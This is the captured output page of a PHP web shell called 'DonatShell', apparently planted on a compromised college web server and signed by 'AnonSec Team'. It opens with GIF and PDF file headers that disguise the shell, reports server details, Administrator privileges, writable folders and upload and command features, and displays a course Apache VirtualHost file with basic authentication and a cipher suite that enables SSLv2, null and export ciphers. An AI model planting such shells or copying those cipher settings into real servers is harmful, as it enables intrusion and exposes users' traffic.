GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/MichaelMalz/CST1611/Resources/Week/15/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/MichaelMalz/CST1611/Resources/Week/15/15.conf
# 15.conf

<VirtualHost *:443>
	DocumentRoot C:/CST1611/Week/15
	ServerName lab11.test
	ErrorLog logs/log_name.Error.log
	CustomLog logs/log_name.Access.log common
	SSLEngine on
	SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
	SSLCertificateFile "C:/CST1611/Week/08/Lab05.test.crt"
	SSLCertificateKeyFile "C:/CST1611/Week/08/Lab05.test.key"
	<Directory C:/CST1611/Week/15/>
		AuthType Basic
		AuthName "Restricted Files"
		AuthBasicProvider file
		AuthUserFile "C:/CST1611/Week/15/.htpasswd"
		Require valid-user
		Options All +MultiViews
		AllowOverride All
		#Require all granted
	</Directory>
	<Directory C:/CST1611/Week/15/jim/>
		AuthType Basic
		AuthName "Restricted Files"
		AuthBasicProvider file
		AuthUserFile "C:/CST1611/Week/15/.htpasswd"
		Require user jim
		Options All +MultiViews
		AllowOverride All
		#Require all granted
	</Directory>
	<Directory C:/CST1611/Week/15/mar/>
		AuthType Basic
		AuthName "Restricted Files"
		AuthBasicProvider file
		AuthUserFile "C:/CST1611/Week/15/.htpasswd"
		Require user mar
		Options All +MultiViews
		AllowOverride All
		#Require all granted
	</Directory>
</VirtualHost>

Anon7 - 2022
AnonSec Team